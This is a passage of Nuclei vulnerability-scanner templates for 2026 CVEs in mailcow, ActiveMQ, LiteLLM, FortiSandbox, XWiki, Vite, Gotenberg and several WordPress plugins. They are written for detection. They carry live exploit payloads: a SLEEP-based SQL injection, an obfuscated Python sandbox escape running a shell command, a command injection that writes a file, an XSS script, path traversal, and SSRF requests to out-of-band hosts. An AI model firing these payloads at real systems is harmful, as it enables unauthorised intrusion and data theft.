true\n    max-request: 2\n    vendor: mailcow\n    product: mailcow-dockerized\n    shodan-query: http.favicon.hash:2146763496\n    fofa-query: title=\"mailcow\"\n  tags: cve,cve2026,mailcow,link-injection\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?session_expired=true&redirect=http://evil.com\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"function setLang\"\n          - \"$.post( '/?session_expired=true&amp;redirect=http://evil.com\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100f1e509bc757bcbddec3d5b1ab6816b71f5e255bb52ba517760da6a3bcdd14a280221009bc6fad91db78926f280c88627457b1e02aca10e045dabd42f719530904ec24e:922c64590222798bb761d5b6d8e72950","severity":"low","template_path":"http/cves/2026/CVE-2026-40878.yaml","vuln_id":"cve-2026-40878"},{"raw":"id: CVE-2026-4060\n\ninfo:\n  name: Geo Mashup <= 1.13.18 - SQL Injection\n  author: ydking0911\n  severity: high\n  description: |\n    Geo Mashup WordPress plugin <= 1.13.18 is vulnerable to time-based SQL injection via the sort parameter. The issue exists because the sort value is insufficiently sanitized in render-map.php/template tag code paths.\n  impact: |\n    Unauthenticated attackers can append SQL queries into existing database queries and potentially extract sensitive information using a time-based blind approach.\n  remediation: |\n    Update Geo Mashup to the latest version.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-4060\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/2fa5ae9a-532c-40f9-b70a-217f0f9cd473?source=cve\n    - https://plugins.trac.wordpress.org/changeset/3503627/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-4060\n    epss-score: 0.01422\n    epss-percentile: 0.71696\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: cyberhobo\n    product: geo_mashup\n    shodan-query: http.html:\"geo-mashup\"\n    fofa-query: body=\"geo-mashup\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,geo-mashup\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/geo-mashup/readme.txt\"\n      - \"{{BaseURL}}\"\n\n    stop-at-first-match: true\n    extractors:\n      - type: regex\n        part: body\n        name: version\n        group: 1\n        regex:\n          - 'Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n    matchers-condition: or\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'geo-mashup')\"\n        condition: and\n        internal: true\n\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, 'Geo Mashup')\"\n          - \"compare_versions(version, '<= 1.13.18')\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 30s\n        GET /?geo_mashup_content=render-map&map_content=global&sort=%28SELECT%280%29FROM%28SELECT%28SLEEP%288%29%29%29a%29 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration >= 8\"\n          - \"status_code == 200\"\n          - \"contains(body, 'GeoMashup.createMap')\"\n        condition: and\n# digest: 4b0a00483046022100d5e737d7e7dbb10e695674d02214baa4bca1361e9471d56fe1643cc587acbed6022100a1d4014d417a059825c2a7ce006dc69ed8e5eb4b5a1302a4769a65e704447aed:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-4060.yaml","vuln_id":"cve-2026-4060"},{"raw":"id: CVE-2026-40466\n\ninfo:\n  name: Apache ActiveMQ - Remote Code Execution via HTTP Discovery Transport Bypass\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Apache ActiveMQ before 5.19.6 and 6.0.0 through 6.2.4 is vulnerable to remote code execution via a bypass of the CVE-2026-34197 security fix. The original fix blocked the \"vm://\" transport scheme in BrokerView.addNetworkConnector() and BrokerView.addConnector() to prevent authenticated attackers from loading malicious Spring XML configurations via the Jolokia API. However, the fix only denied the \"vm\" scheme. An attacker can bypass this restriction by using the HTTP Discovery transport(http://attacker/discovery), which is not in the denied scheme list. The attacker-controlled HTTP endpoint returns a vm:// transport URI as a second-stage response, which then loads a remote Spring XML application context, leading to arbitrary code execution on the broker JVM. The activemq-http module must be on the classpath (present by default in the \"all\" distribution), and authenticated access to the Jolokia API (/api/jolokia/) is required.\n  impact: |\n    Authenticated attackers can execute arbitrary code on the broker JVM, potentially leading to full system compromise.\n  remediation: Attacker must be authenticated and activemq-http module must be on classpath.\n  reference:\n    - https://activemq.apache.org/security-advisories.data/CVE-2026-40466-announcement.txt\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40466\n    - https://github.com/advisories/GHSA-w3w2-mpp5-92gm\n    - https://github.com/apache/activemq/pull/1918\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2026-40466\n    cwe-id: CWE-20,CWE-94\n    epss-score: 0.04783\n    epss-percentile: 0.91522\n    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: apache\n    product: activemq\n    shodan-query: product:\"ActiveMQ\"\n  tags: cve,cve2026,activemq,apache,rce,jolokia,oob,http,unauth,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/jolokia/ HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic YWRtaW46YWRtaW4=\n        Content-Type: application/json\n        Origin: {{RootURL}}\n\n        {\"type\":\"exec\",\"mbean\":\"org.apache.activemq:type=Broker,brokerName=localhost\",\"operation\":\"removeNetworkConnector(java.lang.String)\",\"arguments\":[\"NC\"]}\n\n      - |\n        POST /api/jolokia/ HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic YWRtaW46YWRtaW4=\n        Content-Type: application/json\n        Origin: {{RootURL}}\n\n        {\"type\":\"exec\",\"mbean\":\"org.apache.activemq:type=Broker,brokerName=localhost\",\"operation\":\"addNetworkConnector(java.lang.String)\",\"arguments\":[\"http://{{interactsh-url}}/discovery\"]}\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '{\"request\":{'\n          - 'org.apache.activemq'\n        condition: and\n\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n          - \"dns\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221008f7754f1dab303105b98488a5739c458ea38b488e8e434259f5916a96d0905fd022100cf660a024fa505617d3a9341350ecf2862ac04481936babe3836771aa4512651:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-40466.yaml","vuln_id":"cve-2026-40466"},{"raw":"id: CVE-2026-40308\n\ninfo:\n  name: My Calendar WordPress Plugin - Information Disclosure\n  author: theamanrawat\n  severity: high\n  description: |\n    My Calendar WordPress plugin <= 3.7.6 contains an injection vulnerability caused by unvalidated user input passed to parse_str() in mc_ajax_mcjs_action endpoint, letting unauthenticated attackers access or crash sites via switch_to_blog(), exploit requires WordPress Multisite or Single Site setup.\n  impact: |\n    Unauthenticated attackers can access private events on multisite or cause denial of service on single site installations.\n  remediation: |\n    Update to version 3.7.7 or later.\n  reference:\n    - https://github.com/joedolson/my-calendar/security/advisories/GHSA-2mvx-f5qm-v2ch\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40308\n  classification:\n    cve-id: CVE-2026-40308\n    epss-score: 0.00932\n    epss-percentile: 0.59172\n    cwe-id: CWE-639\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: joedolson\n    product: my-calendar\n    framework: wordpress\n    shodan-query: http.html:\"/wp-content/plugins/my-calendar/\"\n    fofa-query: body=\"/wp-content/plugins/my-calendar/\" && title=\"WordPress\"\n  tags: cve,cve2026,wordpress,wp-plugin,my-calendar,idor,information-disclosure\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"My Calendar\"\n          - \"Stable tag:\"\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?m)Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=mcjs_action&behavior=loadupcoming&args&site=1\"\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'compare_versions(version, \"<= 3.7.6\")'\n          - 'contains_all(body, \"\\\"success\\\":1\", \"response\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a0046304402201aa21e3ed3cbdc1be07ee4897e41c48cf90df19700400c8e23a2186faaf8a9b802201b18dbacc82748b1ee5663965d8fe1721be2c71836a65760f503b95e2d2290df:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-40308.yaml","vuln_id":"cve-2026-40308"},{"raw":"id: CVE-2026-40280\n\ninfo:\n  name: Gotenberg <= 8.30.1 - Server Side Request Forgery\n  author: str4k3r\n  severity: critical\n  description: |\n    Gotenberg is an API-based document conversion tool. In versions 8.30.1 and earlier, the default private-IP deny-lists for the --webhook-deny-list and --api-download-from-deny-list flags use a case-sensitive regular expression (^https?://) to match URL schemes. Because Go's net/url.Parse() normalizes the scheme to lowercase before establishing the outbound TCP connection, an attacker can bypass the deny-list by simply capitalizing part of the URL scheme (e.g., HTTP://, HTTPS://, or Http://). This allows unauthenticated requests to reach internal network services, including private IP ranges, loopback addresses, and cloud instance metadata endpoints such as HTTP://169.254.169.254/latest/meta-data.\n  impact: |\n    Unauthenticated SSRF via the downloadFrom feature allows reaching internal services, cloud metadata endpoints, and loopback addresses from the Gotenberg server.\n  remediation: This bypasses the same security control that was patched in CVE-2026-27018. This issue has been fixed in version 8.31.0.\n  reference:\n    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-5q7p-7jgv-ww56\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40280\n    - https://github.com/gotenberg/gotenberg/commit/3f01ca18d3cc21375a1e2da4b5a3f261c8548e47\n  classification:\n    cve-id: CVE-2026-40280\n    epss-score: 0.0195\n    epss-percentile: 0.79342\n    cwe-id: CWE-918\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\n    cvss-score: 9.3\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: thecodingmachine\n    product: gotenberg\n    shodan-query: http.html:\"Gotenberg\"\n  tags: cve,cve2026,gotenberg,ssrf,downloadfrom,oast\n\nhttp:\n  - raw:\n      - |\n        POST /forms/chromium/convert/html HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----gotenbergProbe\n\n        ------gotenbergProbe\n        Content-Disposition: form-data; name=\"files\"; filename=\"index.html\"\n        Content-Type: text/html\n\n        <html><body>ssrf-probe</body></html>\n        ------gotenbergProbe\n        Content-Disposition: form-data; name=\"downloadFrom\"\n\n        [{\"url\":\"HTTP://{{interactsh-url}}\"}]\n        ------gotenbergProbe--\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"Gotenberg\"\n# digest: 4b0a00483046022100a645da5822f4e8a477080c2bc5746693983f6fa2ed31583a022d7dbc0305da23022100d5c2703a3f8ff3b759e82b48ae82cd0d8f50cabbe31dc334736876bb17135090:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-40280.yaml","vuln_id":"cve-2026-40280"},{"raw":"id: CVE-2026-40242\n\ninfo:\n  name: Arcane <= 1.17.2 - Server-Side Request Forgery\n  author: 0x_Akoko\n  severity: high\n  description: |\n   Arcane <= 1.17.3 contains an unauthenticated server-side request forgery caused by lack of URL scheme and host validation in /api/templates/fetch endpoint, letting remote attackers perform SSRF, exploit requires no authentication.\n  impact: |\n   Remote attackers can make the server perform arbitrary HTTP requests, potentially accessing internal resources or sensitive data.\n  remediation: |\n   Upgrade to version 1.17.3 or later.\n  reference:\n    - https://github.com/getarcaneapp/arcane/security/advisories/GHSA-ff24-4prj-gpmj\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40242\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n    cvss-score: 7.2\n    cve-id: CVE-2026-40242\n    cwe-id: CWE-918\n    epss-score: 0.00621\n    epss-percentile: 0.48391\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: getarcaneapp\n    product: arcane\n    shodan-query: http.html:\"arcane\"\n  tags: cve,cve2026,arcane,ssrf,oast,unauth,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /api/templates/fetch?url=http://{{interactsh-url}}/test.json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(interactsh_protocol, \"http\")\n          - contains(content_type, \"application/json\")\n        condition: and\n# digest: 4b0a004830460221008d13e9c1f25b63db875a41ca7a74c9e08a8950ad7d9daa3c84f07c3706727d62022100d6f1429ce879e7b03afb280247eeff9a21aebc5722ebbcfb346433ebbbf5b012:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-40242.yaml","vuln_id":"cve-2026-40242"},{"raw":"id: CVE-2026-40217\n\ninfo:\n  name: LiteLLM < 1.25.0 - Remote Code Execution\n  author: ritikchaddha\n  severity: high\n  description: |\n    LiteLLM before 1.25.0 allows authenticated users with the master API key to execute arbitrary Python code through the /guardrails/test_custom_code endpoint intended for custom guardrail testing. The endpoint’s insufficient filtering mechanisms can be bypassed, allowing attackers to abuse Python’s string operations and bytecode manipulation to break out of the restricted environment. Successful exploitation may lead to remote code execution as the LiteLLM process user, which may be root when using the default Docker image.\n  impact: |\n    An authenticated attacker with the master key can escape the guardrail sandbox and execute arbitrary commands on the LiteLLM host, potentially as root when using the default container.\n  remediation: |\n    Block /guardrails/test_custom_code at the reverse proxy, restrict admin API access, avoid exposing the management interface to untrusted networks, and do not run LiteLLM as root. Apply vendor patches when available.\n  reference:\n    - https://www.x41-dsec.de/lab/advisories/x41-2026-001-litellm/\n    - https://github.com/BerriAI/litellm\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40217\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\n    cvss-score: 8.7\n    cve-id: CVE-2026-40217\n    epss-score: 0.15056\n    epss-percentile: 0.96571\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:439373620\n    fofa-query: title=\"LiteLLM\"\n  tags: cve,cve2026,litellm,guardrail,rce,intrusive,vkev\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/guardrails/test_custom_code\"\n\n    headers:\n      Authorization: Bearer {{api_key}}\n      Content-Type: application/json\n      Accept: application/json\n\n    body: |\n      {\n        \"custom_code\": \"def apply_guardrail(inputs, request_data, input_type):\\n    obj = str.mro()[1]\\n    def g(fn):\\n        yield fn.placeholder\\n    c = g(None).gi_code\\n    gn = \\\"_\\\"+\\\"_gl\\\"+\\\"ob\\\"+\\\"als\\\"+\\\"_\\\"+\\\"_\\\"\\n    cn = \\\"_\\\"+\\\"_co\\\"+\\\"de_\\\"+\\\"_\\\"\\n    obj.__setattr__(g, cn, c.replace(co_names=(gn,)))\\n    for v in g(http_get):\\n        gd = v\\n        break\\n    bn = \\\"_\\\"+\\\"_bu\\\"+\\\"ilt\\\"+\\\"ins\\\"+\\\"_\\\"+\\\"_\\\"\\n    imp = gd[bn][\\\"_\\\"+\\\"_im\\\"+\\\"po\\\"+\\\"rt_\\\"+\\\"_\\\"]\\n    return {\\\"rce\\\": imp(\\\"os\\\").popen(\\\"id\\\").read()}\",\n        \"test_input\": {\n          \"messages\": [\n            {\n              \"role\": \"user\",\n              \"content\": \"test\"\n            }\n          ]\n        }\n      }\n\n    skip-variables-check: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"rce\\\":\", \"success\\\":true\")'\n          - 'regex(\"uid=[0-9]+.*gid=[0-9]+.*\", body)'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022042a6d0e8c5de2ca8d03bd200cbd6594432478ec7d17d65e0052f685b6beb56170221008c0fa5115ca7150ef507ceed620903995b0267792403fb6adb3e7d77f7138b8a:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-40217.yaml","vuln_id":"cve-2026-40217"},{"raw":"id: CVE-2026-4020\n\ninfo:\n  name: Gravity SMTP WordPress Plugin - Sensitive Information Exposure\n  author: theamanrawat\n  severity: high\n  description: |\n    Gravity SMTP WordPress plugin <= 2.1.4 contains a sensitive information exposure caused by an unrestricted REST API endpoint at /wp-json/gravitysmtp/v1/tests/mock-data, letting unauthenticated attackers retrieve detailed system configuration data, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can access detailed system and configuration data, potentially aiding further attacks or information leakage.\n  remediation: |\n    Update to the latest version beyond 2.1.4.\n  reference:\n    - https://patchstack.com/database/vulnerability/wordpress-gravity-smtp-plugin-2-1-4-unauthenticated-sensitive-information-exposure-via-rest-api-vulnerability\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/12a296db-ecc0-409b-8718-0c208504053a?source=cve\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-4020\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cwe-id: CWE-200\n    cve-id: CVE-2026-4020\n    epss-score: 0.39975\n    epss-percentile: 0.98563\n  metadata:\n    max-request: 1\n    verified: true\n    vendor: rocketgenius\n    product: gravitysmtp\n    framework: wordpress\n  tags: cve,cve2026,exposure,wordpress,wp-plugin,gravitysmtp,wp,unauthenticated,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"gravitysmtp_admin_config\"\n          - \"system_report_clipboard\"\n          - \"feature_flags\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100c57d526d15441ebd2fb4692b6ea3587978a4c6b7d5197b87f8e37b1c11c7a9f302204cb5077c266bbb63eb6c62b64a3454b5dd379aba813a66db9af075a6dcec32a5:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-4020.yaml","vuln_id":"cve-2026-4020"},{"raw":"id: CVE-2026-40151\n\ninfo:\n  name: PraisonAI AgentOS - Information Disclosure\n  author: aryu-ru\n  severity: medium\n  description: |\n    PraisonAI's AgentOS FastAPI application server exposes an unauthenticated `GET /api/agents` endpoint that lists every registered agent's name, role and the opening of its instructions (system prompt). No authentication is enforced on the route, allowing a remote attacker to enumerate agent configurations and harvest sensitive details embedded in system prompts, such as internal API references, business logic and credential hints. This endpoint belongs to the AgentOS FastAPI server and is distinct from the legacy Flask `/agents` server tracked as CVE-2026-44338.\n  impact: |\n    An unauthenticated attacker can disclose agent names, roles and system-prompt content, which frequently contains proprietary business logic, internal endpoints and credential hints.\n  remediation: |\n    Upgrade PraisonAI to version 4.5.128 or later and restrict network access to the AgentOS API.\n  reference:\n    - https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pm96-6xpr-978x\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40151\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-40151\n    epss-score: 0.00758\n    epss-percentile: 0.53723\n    cwe-id: CWE-200\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: praison\n    product: praisonai\n    shodan-query: http.html:\"PraisonAI App\"\n    fofa-query: body=\"PraisonAI App\"\n  tags: cve,cve2026,praisonai,praison,exposure\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/agents\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"agents\"'\n          - '\"role\"'\n          - '\"instructions\"'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '\"role\"\\s*:\\s*\"([^\"]+)\"'\n# digest: 4a0a00473045022100abc200ba4d23147417e49daa780e1823ea01fce6cf1811ca38d15caa9245be07022069d77b06b828ab469c5c0679f0f7a4e585e45dfbb5bc0b80d34c88b8384344ca:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-40151.yaml","vuln_id":"cve-2026-40151"},{"raw":"id: CVE-2026-40105\n\ninfo:\n  name: XWiki - Cross-Site Scripting\n  author: ritikchaddha\n  severity: medium\n  description: |\n    XWiki is vulnerable to reflected Cross-Site Scripting (XSS) via the `viewer=changes` endpoint. The `rev2` parameter is not properly sanitised before being rendered in the response, allowing an attacker to inject arbitrary JavaScript. Affects XWiki versions prior to the patched release.\n  impact: |\n    Attackers can execute JavaScript in users' browsers, potentially compromising admin accounts and the entire XWiki instance.\n  remediation: |\n    Update to a version later than 17.10.0 or apply the patch to templates/changesdoc.vm manually.\n  reference:\n    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w4fj-87j5-f25c\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-40105\n    - https://jira.xwiki.org/browse/XWIKI-22481\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-40105\n    epss-score: 0.00549\n    epss-percentile: 0.44818\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: xwiki\n    product: xwiki-platform\n    shodan-query: http.title:\"XWiki\"\n  tags: cve,cve2026,xwiki,xss\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/bin/view/Sandbox/?viewer=changes&rev1=9.1&rev2=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F17.6.0q1che%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Evfu80q44msz&form_token=test&language=en\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<script>alert(document.domain)</script>\"\n          - \"<h1>Changes for page\"\n          - \"From version\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220468e57d17132bef9da920f9481032add948d032d23052f8479ff19640f2c3fcf022100ae6c05c06521074c1e226b51c32b68993929dfb4d422bde498db641732c2733c:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-40105.yaml","vuln_id":"cve-2026-40105"},{"raw":"id: CVE-2026-39808\n\ninfo:\n  name: Fortinet FortiSandbox - Command Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Fortinet FortiSandbox 4.4.0 through 4.4.8 contains a command injection caused by improper neutralization of special elements in OS commands, letting attackers execute unauthorized code or commands, exploit requires crafted input.\n  impact: |\n    Attackers can execute arbitrary code or commands, potentially leading to full system compromise.\n  remediation: Upgrade FortiSandbox to version 4.4.9 or later.\n  reference:\n    - https://fortiguard.fortinet.com/psirt/FG-IR-26-100\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-39808\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-39808\n    cwe-id: CWE-78\n    epss-score: 0.92819\n    epss-percentile: 0.99825\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: fortinet\n    product: fortisandbox\n    shodan-query: http.title:\"FortiSandbox\"\n    fofa-query: title=\"FortiSandbox\"\n  tags: cve,cve2026,fortisandbox,fortinet,rce,intrusive,file-upload,vkev,kev\n\nvariables:\n  string: \"{{randstr}}\"\n  filename: \"{{to_lower(rand_text_alpha(8))}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+{{string}}+%3e+%2fweb%2fng%2f{{filename}}.txt%29%7c HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains(body, 'fortisandbox')\"\n        internal: true\n\n  - raw:\n      - |\n        GET /ng/{{filename}}.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, '{{string}}')\"\n        condition: and\n# digest: 4a0a00473045022100818cecae725335469a77028da98e2a90dd98cf56dc6fd4a0550aaf37f46048a1022075479353ec077a5a883adec74635e89970960963cb8ae1829f68be05c112f102:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-39808.yaml","vuln_id":"cve-2026-39808"},{"raw":"id: CVE-2026-39468\n\ninfo:\n  name: Meta Box <= 5.11.1 - Arbitrary File Deletion\n  author: iamatownboy\n  severity: high\n  description: |\n    The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the ajax_delete_file function. This makes it possible for authenticated attackers with Contributor-level access and above to delete arbitrary files on the server.\n  impact: |\n    Authenticated attackers can delete arbitrary files such as wp-config.php, which can lead to remote code execution in the right configuration.\n  remediation: |\n    Update Meta Box to version 5.11.2 or later.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/id/036467de-95bb-4bfd-9522-df8dc17f3102?source=cve\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-14675\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 7.2\n    cve-id: CVE-2025-14675\n    epss-score: 0.01221\n    epss-percentile: 0.67368\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: metabox\n    product: meta-box\n    framework: wordpress\n    publicwww-query: \"/wp-content/plugins/meta-box/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,meta-box,file-deletion,passive\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/meta-box/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, \"Meta Box\")\n          - compare_versions(version, \"<= 5.11.1\")\n        condition: and\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9.]+)'\n        internal: true\n# digest: 4a0a00473045022050561088e78d283edde87fcbad87cb24768fee2a08bf7e2d6a0e85789df2e6eb022100b050dfe212b6990086882f90be0c8ce318c7da030e96ca38dba5e9ee4b4b382a:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-39468.yaml","vuln_id":"cve-2026-39468"},{"raw":"id: CVE-2026-39365\n\ninfo:\n  name: Vite Dev Server - Path Traversal in Optimized Deps .map Handling\n  author: theamanrawat\n  severity: medium\n  description: |\n    Vite development server versions prior to 8.0.5, 7.3.2, and 6.4.2 are vulnerable to path traversal through the optimized dependencies sourcemap handler. The dev server's handling of .map requests for optimized dependencies resolves file paths via normalizePath(path.resolve(root, url.slice(1))) and calls readFile without restricting ../ segments in the URL. This allows an attacker to bypass server.fs.strict and retrieve auto-generated sourcemaps for files located outside the project root, leaking absolute filesystem paths. Only dev servers explicitly exposed to the network using --host or server.host are affected.\n  impact: |\n    An attacker can trigger auto-generated sourcemap responses for files outside the project directory, leaking absolute filesystem paths and potentially reading .map files containing sensitive source code or configuration data.\n  remediation:\n    Upgrade Vite to version 8.0.5, 7.3.2, 6.4.2 or later.\n  reference:\n    - https://github.com/advisories/GHSA-4w7w-66w2-5vf9\n    - https://github.com/vitejs/vite/security/advisories/GHSA-4w7w-66w2-5vf9\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-39365\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-39365\n    epss-score: 0.00914\n    epss-percentile: 0.58595\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.html:\"/@vite/client\" port:\"5173\"\n    fofa-query: body=\"/@vite/client\" && port=\"5173\"\n  tags: cve,cve2026,vite,lfi,path-traversal,vuln,unauthenticated,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_1\n        words:\n          - \"/@vite/client\"\n        internal: true\n\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - raw:\n      - |\n        GET /node_modules/.vite/deps/../../../config.production.js.map HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"\\\"version\\\":3\"\n          - \"\\\"mappings\\\"\"\n        condition: and\n\n      - type: regex\n        part: body\n        regex:\n          - 